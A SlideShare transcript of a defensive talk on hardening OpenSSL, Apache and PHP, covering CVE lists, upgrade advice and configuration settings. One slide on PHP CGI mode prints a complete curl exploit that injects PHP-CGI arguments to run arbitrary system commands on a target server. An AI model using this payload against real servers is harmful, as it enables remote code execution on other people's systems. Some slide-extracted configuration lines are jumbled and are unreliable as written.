SlideShare a Scribd company logo

Apache web-server-security

Andrew Carr
Andrew Carr

Apache web-server-security

Technology
1 of 38
Download to read offline
OpenLogic by Perforce © Perforce Software, Inc. ANDREW L. CARR | SR. ENTERPRISE ARCHITECH
openlogic.com2 | OpenLogic by Perforce © Perforce Software, Inc. Confidentiality Statement The information contained in this document is strictly confidential, privileged, and only for the information of the intended recipient. The information contained in this document may not be otherwise used, disclosed, copied, altered, or distributed without the prior written consent of Perforce Software, Inc.
openlogic.com3 | OpenLogic by Perforce © Perforce Software, Inc. Overview A U G 1 2 , 2 0 2 0 PHP, Apache and OpenSSL Vulnerabilities Andrew Carr Java Developer / Enterprise Architect Started professionally in 2001
openlogic.com4 | OpenLogic by Perforce © Perforce Software, Inc. Agenda P A T H CORE CONCEPTS Review OpenSSL Review Apache Hardening Review PHP Hardening MODIFYING Modifying the configuration. REMOVING Problematic modules and configurations. ADDING Modules that focus on security.
OpenSSL
openlogic.com6 | OpenLogic by Perforce © Perforce Software, Inc. OpenSSL is a robust, commercial-grade, and full- featured toolkit for the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols • Provides encryption tools • Allows Apache / Other web servers to encrypt traffic • Provides a lot of other tools
openlogic.com7 | OpenLogic by Perforce © Perforce Software, Inc. Encryption in Detail T Y P E S O F E N C R Y P T I O N D E F I N I T I O N S Symmetric Key Public Key Cipher Algorithm used for encryption or decryption Algorithm Procedure the encryption process follows Cryptanalysis Study of ciphers and cryptosystems to find weakness
openlogic.com8 | OpenLogic by Perforce © Perforce Software, Inc. OpenSSL Between 1998 and 2010 - 0.9.1 – 0.9.8 Current version, released 3.0, releaased 2020 Companies currently run production with 0.9.8-1.1.x, 7-12 years old
openlogic.com9 | OpenLogic by Perforce © Perforce Software, Inc. OpenSSL - CLI ‘openssl version’ ‘openssl version –a’ ’openssl ciphers –v’ (Cipher list, use ’man cipher’ for more information) ‘openssl speed’ (Benchmark Tool)
openlogic.com10 | OpenLogic by Perforce © Perforce Software, Inc. Heartbleed • Bug is in the OpenSSL's implementation of the TLS/DTLS (transport layer security protocols) heartbeat extension (RFC6520). When it is exploited it leads to the leak of memory contents from the server to the client and from the client to the server. • "Without using any privileged information or credentials we were able steal from ourselves the secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business critical documents and communication.” • Affects • OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable • OpenSSL 1.0.1g is NOT vulnerable • OpenSSL 1.0.0 branch is NOT vulnerable • OpenSSL 0.9.8 branch is NOT vulnerable • Mitigation • 1.0.1g or newer should be used. • -DOPENSSL_NO_HEARTBEATS.
openlogic.com11 | OpenLogic by Perforce © Perforce Software, Inc. Heartbleed in the Community Venafi Scan Of Forbes global 2000, more than .5 million hosts are vulnerable. What should they do? Upgrade SSL | Create new keys | Reissue certs
openlogic.com12 | OpenLogic by Perforce © Perforce Software, Inc. OpenSSL - DOS CVE-2017-3733 What is DOS? Affected versions include 0.9.8 – 1.1.0 (not 1.0.2) Mitigation • Upgrade SSL – 1.1.0e • Use OpenSSL 1.0.2 0.9.8 EOL – Dec 2015 (DO NOT USE)
openlogic.com13 | OpenLogic by Perforce © Perforce Software, Inc. • Stay current - https://www.openssl.org/news/ • CVEs - https://cve.mitre.org/cgi- bin/cvekey.cgi?keyword=openssl • OpenUpdate from OpenLogic • Ensure your OpenSSL is up-2-date OpenSSL – How To Avoid Vulnerability
openlogic.com14 | OpenLogic by Perforce © Perforce Software, Inc. • DROWN • A serious vulnerability that affects HTTPS and other services that rely on SSL and TLS, some of the essential cryptographic protocols for Internet security. These protocols allow everyone on the Internet to browse the web, use email, shop online, and send instant messages without third-parties being able to read the communication. • HEARTBLEED • M-I-T-M Attack • DOS Vulnerabilities • Other M-I-T-M • Symatec discovers vulnerability that affects OpenSSL versions 1.0.2c, 1.0.2b, 1.0.1n, and 1.0.1o. Users of versions 1.0.2b and 1.0.2c are advised to immediately upgrade to 1.0.2d. Users of versions 1.0.1n and 1.0.1o are advised to immediately upgrade to 1.0.1p. OpenSSL Vulnerabilities
openlogic.com15 | OpenLogic by Perforce © Perforce Software, Inc. OpenSSL Installation OpenSSL is preinstalled on a lot of operating systems. Building is simple Get the source Configure Compile Install Reference new SSL when building other products
openlogic.com16 | OpenLogic by Perforce © Perforce Software, Inc. • Stay Current • This is limited by other software’s ability to update • Normal network safety hardening • Limit of what you can harden with OpenSSL specifically • OpenSSL is used to support the applications we will harden OpenSSL Hardening
Apache Web Server
openlogic.com18 | OpenLogic by Perforce © Perforce Software, Inc. Apache Web Server A community webserver with prolific implementation Current versions 2.4.29 2.2.34 (FINAL) 2.2 was EOL’d June 2017 with security updates to December 2017 Appx 68 million public instances of Apache Web in use (builtwith.com) More than 70% use vulnerable versions
openlogic.com19 | OpenLogic by Perforce © Perforce Software, Inc. Apache Vulnerabilities 0 - D A Y – W H A T I S I T ? 2 . 2 V U L N E R A B I L I T I E S OptionsBleed - CVE-2017-9798 • Ignore the htaccess file Unitialized Memory Reflection – CVE-2017-9788 • Affects 2.2.0 – 2.2.32 (fixed in .34) • Reveals confidential information • Authentication Bypass – CVE- 2017-3167
openlogic.com20 | OpenLogic by Perforce © Perforce Software, Inc. CVE Apache 2.2.22 Vulnerability DOS http://www.cvedetails.com/cve/CVE-2014-0098/ http://www.cvedetails.com/cve/CVE-2013-6438/ http://www.cvedetails.com/cve/CVE-2014-0231/ http://www.cvedetails.com/cve/CVE-2013-1896/ XSS http://www.cvedetails.com/cve/CVE-2012-4558/ http://www.cvedetails.com/cve/CVE-2012-3499/ Code-Exec http://www.cvedetails.com/cve/CVE-2013-1862/
openlogic.com21 | OpenLogic by Perforce © Perforce Software, Inc. Apache 2.2 Additional Vulnerabilities • important: Uninitialized memory reflection in mod_auth_digest (CVE-2017- 9788) • important: ap_get_basic_auth_pw() Authentication Bypass (CVE-2017- 3167) • important: mod_ssl Null Pointer Dereference (CVE-2017-3169) • important: ap_find_token() Buffer Overread (CVE-2017-7668) • important: mod_mime Buffer Overread (CVE-2017-7679) • important: Apache HTTP Request Parsing Whitespace Defects (CVE-2016- 8743) • n/a: HTTP_PROXY environment variable "httpoxy" mitigation (CVE-2016- 5387) • low: HTTP request smuggling attack against chunked request parser (CVE- 2015-3183) • important: mod_cgid denial of service (CVE-2014-0231) • low: HTTP Trailers processing bypass (CVE-2013-5704) • moderate: mod_deflate denial of service (CVE-2014-0118) • moderate: mod_status buffer overflow (CVE-2014-0226) • low: mod_log_config crash (CVE-2014-0098) • moderate: mod_dav crash (CVE-2013-6438) • low: mod_rewrite log escape filtering (CVE-2013-1862) • moderate: mod_dav crash (CVE-2013-1896) • low: XSS due to unescaped hostnames (CVE-2012-3499) • moderate: XSS in mod_proxy_balancer (CVE-2012-4558) • low: XSS in mod_negotiation when untrusted uploads are supported (CVE- 2012-2687) • Note: This issue is also known as CVE-2008-0455. • low: insecure LD_LIBRARY_PATH handling (CVE-2012-0883) • low: mod_proxy_ajp remote DoS (CVE-2012-4557) • low: mod_setenvif .htaccess privilege escalation (CVE-2011-3607) • low: mod_log_config crash (CVE-2012-0021) • low: scoreboard parent DoS (CVE-2012-0031) • moderate: mod_proxy reverse proxy exposure (CVE-2011-4317) • moderate: error responses can expose cookies (CVE-2012-0053) • low: mod_deflate DoS (CVE-2009-1891) • low: AllowOverride Options handling bypass (CVE-2009-1195) • low: CRLF injection in mod_negotiation when untrusted uploads are supported (CVE-2008-0456) • moderate: APR-util off-by-one overflow (CVE-2009-1956) • moderate: APR-util XML DoS (CVE-2009-1955) • moderate: APR-util heap underwrite (CVE-2009-0023) • important: Timeout detection flaw (mod_proxy_http) (CVE-2010-2791) • low: mod_proxy_ftp globbing XSS (CVE-2008-2939) • low: mod_proxy_balancer CSRF (CVE-2007-6420) • moderate: mod_proxy_http DoS (CVE-2008-2364) • low: mod_proxy_ftp UTF-7 XSS (CVE-2008-0005) • low: mod_proxy_balancer DoS (CVE-2007-6422) • low: mod_proxy_balancer XSS (CVE-2007-6421) • moderate: mod_status XSS (CVE-2007-6388) • moderate: mod_imagemap XSS (CVE-2007-5000) • moderate: mod_proxy crash (CVE-2007-3847) • moderate: mod_status cross-site scripting (CVE-2006-5752) • moderate: Signals to arbitrary processes (CVE-2007-3304) • moderate: mod_cache information leak (CVE-2007-1862) • moderate: mod_cache proxy DoS (CVE-2007-1863) • important: mod_rewrite off-by-one error (CVE-2006-3747) • low: mod_ssl access control DoS (CVE-2005-3357) • moderate: mod_imap Referer Cross-Site Scripting (CVE-2005-3352) • moderate: mod_proxy_ajp remote DoS (CVE-2011-3348) • important: Range header remote DoS (CVE-2011-3192) • Advisory: CVE-2011-3192.txt • moderate: apr_fnmatch flaw leads to mod_autoindex remote DoS (CVE- 2011-0419) • low: expat DoS (CVE-2009-3720) • low: expat DoS (CVE-2009-3560) • low: apr_bridage_split_line DoS (CVE-2010-1623) • important: Timeout detection flaw (mod_proxy_http) (CVE-2010-2068) http://www.apache.org/dist/httpd/patches/apply_to_2.2.15/CVE-2010- 2068-r953616.patch • http://www.apache.org/dist/httpd/patches/apply_to_2.3.5/CVE-2010- 2068-r953418.patch • http://www.apache.org/dist/httpd/binaries/win32/mod_proxy_http-CVE- 2010-2068.zip • low: mod_cache and mod_dav DoS (CVE-2010-1452) • important: mod_isapi module unload flaw (CVE-2010-0425) • low: Subrequest handling of request headers (mod_headers) (CVE-2010- 0434) • moderate: mod_proxy_ajp DoS (CVE-2010-0408) • low: mod_proxy_ftp DoS (CVE-2009-3094) • low: mod_proxy_ftp FTP command injection (CVE-2009-3095) • moderate: Solaris pollset DoS (CVE-2009-2699) • low: APR apr_palloc heap overflow (CVE-2009-2412) • important: mod_proxy reverse proxy DoS (CVE-2009-1890) • important: mod_proxy_ajp information disclosure (CVE-2009-1191)
openlogic.com22 | OpenLogic by Perforce © Perforce Software, Inc. Apache - Upgrading UPGRADE TO 2.4 Not that complicated Most setups that run 2.2 will run 2.4 http://httpd.apache.org/docs/2.4/upgrading.html 2.2 configuration Order deny,allow Deny from al TO-> Require all denied 2.2 configuration: Order allow,deny Allow from all TO-> Require all granted
openlogic.com23 | OpenLogic by Perforce © Perforce Software, Inc. • CVE-2009-1891 399 • Mod-Deflate allowing DDOS • Latest affected version is 2.2.11, but there are sporadic reports on early 2.4 • CVE-2009-1890 189 • Mod_proxy_httpallowing DDOS via CPU locking • Latest version 2.3.2, some reports on 2.4.0-.1 • CVE-2013-2249 • Mod_session_dbd module allowing arbitrary command execution via HTTP request containing escape chars • Latest affected version 2.4.4 • CVE-2012-0883 • Envvars-std TROJAN HORSE injection • Version 2.4.2 is affected. Critical Apache 2.4 Vulnerabilities
openlogic.com24 | OpenLogic by Perforce © Perforce Software, Inc. • What is hardening? • ServerSignature • Turn off • Prevents pages from displaying information about the server • Turn off directory listings • Options • Check for unused modules • Httpd conf • Use groups / users • Httpd conf – user / group Hardening Apache 2
openlogic.com25 | OpenLogic by Perforce © Perforce Software, Inc. Hardening Apache 2 (cont.) Use Allow and Deny on directories • <Directory> Deny from all Use Install mod_security • Yum install libapache2-modsecurity Install Use mod_evasiveUse Disable Symlinks • -FollowSymLinks Disable Turn off serverside includes • -Includes Turn off
PHP
openlogic.com27 | OpenLogic by Perforce © Perforce Software, Inc. PHP 5-7 PHP is in use everywhere PHP 5 has over 500 vulnerabilites (Mitre.org) Upgrade to PHP 7 Lots of information on migration http://php.net/manual/en/migration70.php If you have to use 5, harden it
openlogic.com28 | OpenLogic by Perforce © Perforce Software, Inc. • Affected Versions • 7.3 to 7.3.10 • What is It? • Allows an attacker to execute remote code to gain control of system data • How? • Bug #78559 (Heap Buffer Overflow in mb_eregi) • Mitigation • Upgrade to 7.4 • Apply security hardening principals, like least privilege • Exploits • No current exploits known, that does not mean they don’t exist Remote Code Execution Vulnerability
openlogic.com29 | OpenLogic by Perforce © Perforce Software, Inc. • Mongo Admin tool • Allows execution of code • Not PHP’s fault • Large negative impact Php 5.5.9 Exploit – Moadmin
openlogic.com30 | OpenLogic by Perforce © Perforce Software, Inc. Hardening PHP Prevent fOpen wrappers • Allow_url_fopen Prevent Limit process time / input time • Max_input_time • Max_execution_time Limit Limit script memory • Memory_limit Limit Turn Register Globals off • Register_globals Turn
openlogic.com31 | OpenLogic by Perforce © Perforce Software, Inc. Hardening PHP Don’t expose PHP in response • Expose_php Don’t expose Only use redirect • Cgi.force_redirect Use Impose input restrictions • Post_max_size • Max_input_vars Impose Do not display error information • Display_errors=0 • Display_startup_errors Do not display
openlogic.com32 | OpenLogic by Perforce © Perforce Software, Inc. Hardening PHP log_errors=1 error_log = <path> Logging Restrict File Access open_basedir = <path> Restrict file_uploads = 0 <or> Upload_max_filesize = 1M File Uploads Session Security Cookie Security Security
openlogic.com33 | OpenLogic by Perforce © Perforce Software, Inc. • sudo yum install git gcc gcc-c++ libxml2-devel pkgconfig openssl-devel bzip2-devel curl-devel libpng-devel libjpeg-devel libXpm-devel freetype-devel gmp-devel libmcrypt-devel mariadb-devel aspell-devel recode-devel autoconf bison re2c libicu-devel • (Possibly) yum install bison • sudo mkdir /usr/local/php7 • git clone https://github.com/php/php-src.git • cd php-src • git checkout PHP-7.4.9 • ./buildconf –force • ./configure --prefix=/usr/local/php7 --with-config-file-path=/usr/local/php7/etc --with-config-file-scan-dir=/usr/local/php7/etc/conf.d --enable-bcmath --with-bz2 --with-curl --enable-filter --enable-fpm --with-gd --enable-gd-native-ttf --with-freetype-dir --with-jpeg-dir --with-png-dir --enable-intl -- enable-mbstring --with-mcrypt --enable-mysqlnd --with-mysql-sock=/var/lib/mysql/mysql.sock --with-mysqli=mysqlnd --with-pdo-mysql=mysqlnd -- with-pdo-sqlite --disable-phpdbg --disable-phpdbg-webhelper --enable-opcache --with-openssl --enable-simplexml --with-sqlite3 --enable-xmlreader -- enable-xmlwriter --enable-zip --with-zlib • make && make install Building PHP 7
openlogic.com34 | OpenLogic by Perforce © Perforce Software, Inc. Building PHP 7 H O W T O B U I L D • Get the source • Get the dependencies • Grab additional files for anything you want to enable • ./configure –help is your friend • Ask Perforce experts
openlogic.com35 | OpenLogic by Perforce © Perforce Software, Inc. A Note About CGI Mode What is it? A mode to serve (interpret) pages without a web server. “Secure” This is supposed to be secure.
openlogic.com36 | OpenLogic by Perforce © Perforce Software, Inc. Why CGI Mode is NOT Secure Remote Code Execution You are inviting this sort of attack. Common Exploits There are several common exploits to take advantage of this. curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' --data-binary "<?php system("$2"); die; ?>" "http://$1/cgibin/php5?%2dd+allow_url_include%3don+%2dd+safe_mode%3doff+%2dd+suhosin%2esimulation%3don+%2dd+disable_functions%3d%22%22+%2d d+open_basedir%3dnone+%2dd+auto_prepend_file%3dphp%3a%2f%2finput+%2dd+cgi%2eforce_redirect%3d0+%2dd+cgi%2eredirect_status_env%3d0+%2dn"
openlogic.com37 | OpenLogic by Perforce © Perforce Software, Inc. • The web is your friend!!! • Anti-Clickjacking and other practices • https://geekflare.com/10-best-practices-to-secure-and-harden-your-apache-web-server/f • Linux Hardening of Apache • https://wiki.debian.org/Apache/Hardening • PHP Hardening • http://www.hardened-php.net/ Hardening
Q & A

Recommended

Cisco Spark & Tropo API Workshop
Cisco Spark & Tropo API WorkshopCisco Spark & Tropo API Workshop
Cisco Spark & Tropo API WorkshopCisco DevNet
 
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer ConferenceCisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer ConferenceCisco DevNet
 
Alfresco security best practices CHECK LIST ONLY
Alfresco security best practices CHECK LIST ONLYAlfresco security best practices CHECK LIST ONLY
Alfresco security best practices CHECK LIST ONLYToni de la Fuente
 
UKOUG Tech17 - Stay Secure With Oracle Solaris
UKOUG Tech17 - Stay Secure With Oracle SolarisUKOUG Tech17 - Stay Secure With Oracle Solaris
UKOUG Tech17 - Stay Secure With Oracle SolarisJomaSoft
 
44cafe heart bleed
44cafe heart bleed44cafe heart bleed
44cafe heart bleediphonepentest
 
Evaluating iOS Applications
Evaluating iOS ApplicationsEvaluating iOS Applications
Evaluating iOS Applicationsiphonepentest
 
IoT Meets Security
IoT Meets SecurityIoT Meets Security
IoT Meets SecuritySamsung Open Source Group
 
IPv6 for Pentesters
IPv6 for PentestersIPv6 for Pentesters
IPv6 for PentestersNotSoSecure Global Services
 

Recommended

Cisco Spark & Tropo API Workshop
Cisco Spark & Tropo API WorkshopCisco Spark & Tropo API Workshop
Cisco Spark & Tropo API WorkshopCisco DevNet
 
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer ConferenceCisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer ConferenceCisco DevNet
 
Alfresco security best practices CHECK LIST ONLY
Alfresco security best practices CHECK LIST ONLYAlfresco security best practices CHECK LIST ONLY
Alfresco security best practices CHECK LIST ONLYToni de la Fuente
 
UKOUG Tech17 - Stay Secure With Oracle Solaris
UKOUG Tech17 - Stay Secure With Oracle SolarisUKOUG Tech17 - Stay Secure With Oracle Solaris
UKOUG Tech17 - Stay Secure With Oracle SolarisJomaSoft
 
44cafe heart bleed
44cafe heart bleed44cafe heart bleed
44cafe heart bleediphonepentest
 
Evaluating iOS Applications
Evaluating iOS ApplicationsEvaluating iOS Applications
Evaluating iOS Applicationsiphonepentest
 
IoT Meets Security
IoT Meets SecurityIoT Meets Security
IoT Meets SecuritySamsung Open Source Group
 
IPv6 for Pentesters
IPv6 for PentestersIPv6 for Pentesters
IPv6 for PentestersNotSoSecure Global Services
 
Matteo Meucci OWASP Testing Guide v4
Matteo Meucci OWASP Testing Guide v4Matteo Meucci OWASP Testing Guide v4
Matteo Meucci OWASP Testing Guide v4Matteo Meucci
 
[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security HeadersOWASP
 
LAS16-300K2: Geoff Thorpe - IoT Zephyr
LAS16-300K2: Geoff Thorpe - IoT ZephyrLAS16-300K2: Geoff Thorpe - IoT Zephyr
LAS16-300K2: Geoff Thorpe - IoT ZephyrShovan Sargunam
 
Introduction to Optee (26 may 2016)
Introduction to Optee (26 may 2016)Introduction to Optee (26 may 2016)
Introduction to Optee (26 may 2016)Yannick Gicquel
 
Custom Rules & Broken Tools
Custom Rules & Broken ToolsCustom Rules & Broken Tools
Custom Rules & Broken ToolsNotSoSecure Global Services
 
Advanced Kurento Real Time Media Stream Processing
Advanced Kurento Real Time Media Stream ProcessingAdvanced Kurento Real Time Media Stream Processing
Advanced Kurento Real Time Media Stream ProcessingFIWARE
 
HTML5 Multimedia Streaming
HTML5 Multimedia StreamingHTML5 Multimedia Streaming
HTML5 Multimedia StreamingEDINA, University of Edinburgh
 
Operating project
Operating projectOperating project
Operating projectISMAT CH
 
Kali kinux1
Kali kinux1Kali kinux1
Kali kinux1Mohammad Mafi
 
final doc
final docfinal doc
final docAditya Kushwaha
 
Resilient IoT Security: The end of flat security models
Resilient IoT Security: The end of flat security modelsResilient IoT Security: The end of flat security models
Resilient IoT Security: The end of flat security modelsMilosch Meriac
 
Owasp testing guide owasp summit 2011 (matteo meucci)
Owasp testing guide owasp summit 2011 (matteo meucci) Owasp testing guide owasp summit 2011 (matteo meucci)
Owasp testing guide owasp summit 2011 (matteo meucci) Matteo Meucci
 
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on..." Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on...PROIDEA
 
Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)
Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)
Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)Andrew Carr
 
SVILUPPO WEB E SICUREZZA NEL 2014
SVILUPPO WEB E SICUREZZA NEL 2014SVILUPPO WEB E SICUREZZA NEL 2014
SVILUPPO WEB E SICUREZZA NEL 2014Massimo Chirivì
 
Here Be Dragons: Security Maps of the Container New World
Here Be Dragons: Security Maps of the Container New WorldHere Be Dragons: Security Maps of the Container New World
Here Be Dragons: Security Maps of the Container New WorldC4Media
 
Software Defined Networking/Openflow: A path to Programmable Networks
Software Defined Networking/Openflow: A path to Programmable NetworksSoftware Defined Networking/Openflow: A path to Programmable Networks
Software Defined Networking/Openflow: A path to Programmable NetworksMyNOG
 
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)ColdFusionConference
 
Q Con New York 2015 Presentation - Conjur
Q Con New York 2015 Presentation - ConjurQ Con New York 2015 Presentation - Conjur
Q Con New York 2015 Presentation - Conjurconjur_inc
 
Apache HttpD Web Server - Hardening and other Security Considerations
Apache HttpD Web Server - Hardening and other Security ConsiderationsApache HttpD Web Server - Hardening and other Security Considerations
Apache HttpD Web Server - Hardening and other Security ConsiderationsAndrew Carr
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?Graham Charters
 
iOS application (in)security
iOS application (in)securityiOS application (in)security
iOS application (in)securityiphonepentest
 

More Related Content

What's hot

Matteo Meucci OWASP Testing Guide v4
Matteo Meucci OWASP Testing Guide v4Matteo Meucci OWASP Testing Guide v4
Matteo Meucci OWASP Testing Guide v4Matteo Meucci
 
[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security HeadersOWASP
 
LAS16-300K2: Geoff Thorpe - IoT Zephyr
LAS16-300K2: Geoff Thorpe - IoT ZephyrLAS16-300K2: Geoff Thorpe - IoT Zephyr
LAS16-300K2: Geoff Thorpe - IoT ZephyrShovan Sargunam
 
Introduction to Optee (26 may 2016)
Introduction to Optee (26 may 2016)Introduction to Optee (26 may 2016)
Introduction to Optee (26 may 2016)Yannick Gicquel
 
Advanced Kurento Real Time Media Stream Processing
Advanced Kurento Real Time Media Stream ProcessingAdvanced Kurento Real Time Media Stream Processing
Advanced Kurento Real Time Media Stream ProcessingFIWARE
 
Operating project
Operating projectOperating project
Operating projectISMAT CH
 
Resilient IoT Security: The end of flat security models
Resilient IoT Security: The end of flat security modelsResilient IoT Security: The end of flat security models
Resilient IoT Security: The end of flat security modelsMilosch Meriac
 
Owasp testing guide owasp summit 2011 (matteo meucci)
Owasp testing guide owasp summit 2011 (matteo meucci) Owasp testing guide owasp summit 2011 (matteo meucci)
Owasp testing guide owasp summit 2011 (matteo meucci) Matteo Meucci
 
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on..." Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on...PROIDEA
 

What's hot (13)

Matteo Meucci OWASP Testing Guide v4
Matteo Meucci OWASP Testing Guide v4Matteo Meucci OWASP Testing Guide v4
Matteo Meucci OWASP Testing Guide v4
 
[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers
 
LAS16-300K2: Geoff Thorpe - IoT Zephyr
LAS16-300K2: Geoff Thorpe - IoT ZephyrLAS16-300K2: Geoff Thorpe - IoT Zephyr
LAS16-300K2: Geoff Thorpe - IoT Zephyr
 
Introduction to Optee (26 may 2016)
Introduction to Optee (26 may 2016)Introduction to Optee (26 may 2016)
Introduction to Optee (26 may 2016)
 
Custom Rules & Broken Tools
Custom Rules & Broken ToolsCustom Rules & Broken Tools
Custom Rules & Broken Tools
 
Advanced Kurento Real Time Media Stream Processing
Advanced Kurento Real Time Media Stream ProcessingAdvanced Kurento Real Time Media Stream Processing
Advanced Kurento Real Time Media Stream Processing
 
HTML5 Multimedia Streaming
HTML5 Multimedia StreamingHTML5 Multimedia Streaming
HTML5 Multimedia Streaming
 
Operating project
Operating projectOperating project
Operating project
 
Kali kinux1
Kali kinux1Kali kinux1
Kali kinux1
 
final doc
final docfinal doc
final doc
 
Resilient IoT Security: The end of flat security models
Resilient IoT Security: The end of flat security modelsResilient IoT Security: The end of flat security models
Resilient IoT Security: The end of flat security models
 
Owasp testing guide owasp summit 2011 (matteo meucci)
Owasp testing guide owasp summit 2011 (matteo meucci) Owasp testing guide owasp summit 2011 (matteo meucci)
Owasp testing guide owasp summit 2011 (matteo meucci)
 
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on..." Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
 

Similar to Apache web-server-security

Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)
Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)
Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)Andrew Carr
 
SVILUPPO WEB E SICUREZZA NEL 2014
SVILUPPO WEB E SICUREZZA NEL 2014SVILUPPO WEB E SICUREZZA NEL 2014
SVILUPPO WEB E SICUREZZA NEL 2014Massimo Chirivì
 
Here Be Dragons: Security Maps of the Container New World
Here Be Dragons: Security Maps of the Container New WorldHere Be Dragons: Security Maps of the Container New World
Here Be Dragons: Security Maps of the Container New WorldC4Media
 
Software Defined Networking/Openflow: A path to Programmable Networks
Software Defined Networking/Openflow: A path to Programmable NetworksSoftware Defined Networking/Openflow: A path to Programmable Networks
Software Defined Networking/Openflow: A path to Programmable NetworksMyNOG
 
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)ColdFusionConference
 
Q Con New York 2015 Presentation - Conjur
Q Con New York 2015 Presentation - ConjurQ Con New York 2015 Presentation - Conjur
Q Con New York 2015 Presentation - Conjurconjur_inc
 
Apache HttpD Web Server - Hardening and other Security Considerations
Apache HttpD Web Server - Hardening and other Security ConsiderationsApache HttpD Web Server - Hardening and other Security Considerations
Apache HttpD Web Server - Hardening and other Security ConsiderationsAndrew Carr
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?Graham Charters
 
iOS application (in)security
iOS application (in)securityiOS application (in)security
iOS application (in)securityiphonepentest
 
LibreSSL, one year later
LibreSSL, one year laterLibreSSL, one year later
LibreSSL, one year laterGiovanni Bechis
 
Software update for embedded systems
Software update for embedded systemsSoftware update for embedded systems
Software update for embedded systemsSZ Lin
 
Introducing Cloud Development with Project Shipped and Mantl: a deep dive
Introducing Cloud Development with Project Shipped and Mantl: a deep diveIntroducing Cloud Development with Project Shipped and Mantl: a deep dive
Introducing Cloud Development with Project Shipped and Mantl: a deep diveCisco DevNet
 
Introducing Cloud Development with Mantl
Introducing Cloud Development with MantlIntroducing Cloud Development with Mantl
Introducing Cloud Development with MantlCisco DevNet
 
21st Docker Switzerland Meetup - ISTIO
21st Docker Switzerland Meetup - ISTIO21st Docker Switzerland Meetup - ISTIO
21st Docker Switzerland Meetup - ISTIONiklaus Hirt
 
Learn OpenStack from trystack.cn
Learn OpenStack from trystack.cnLearn OpenStack from trystack.cn
Learn OpenStack from trystack.cnOpenCity Community
 
Zephyr Introduction - Nordic Webinar - Sept. 24.pdf
Zephyr Introduction - Nordic Webinar - Sept. 24.pdfZephyr Introduction - Nordic Webinar - Sept. 24.pdf
Zephyr Introduction - Nordic Webinar - Sept. 24.pdfAswathRangaraj1
 
Open stackbrief happylearning
Open stackbrief happylearningOpen stackbrief happylearning
Open stackbrief happylearningLigong Duan
 
Managing the SSL Process
Managing the SSL ProcessManaging the SSL Process
Managing the SSL ProcessRocket Software
 
Building world-class security response and secure development processes
Building world-class security response and secure development processesBuilding world-class security response and secure development processes
Building world-class security response and secure development processesDavid Jorm
 
POCO C++ Libraries Intro and Overview
POCO C++ Libraries Intro and OverviewPOCO C++ Libraries Intro and Overview
POCO C++ Libraries Intro and OverviewGünter Obiltschnig
 

Similar to Apache web-server-security (20)

Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)
Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)
Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)
 
SVILUPPO WEB E SICUREZZA NEL 2014
SVILUPPO WEB E SICUREZZA NEL 2014SVILUPPO WEB E SICUREZZA NEL 2014
SVILUPPO WEB E SICUREZZA NEL 2014
 
Here Be Dragons: Security Maps of the Container New World
Here Be Dragons: Security Maps of the Container New WorldHere Be Dragons: Security Maps of the Container New World
Here Be Dragons: Security Maps of the Container New World
 
Software Defined Networking/Openflow: A path to Programmable Networks
Software Defined Networking/Openflow: A path to Programmable NetworksSoftware Defined Networking/Openflow: A path to Programmable Networks
Software Defined Networking/Openflow: A path to Programmable Networks
 
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)
 
Q Con New York 2015 Presentation - Conjur
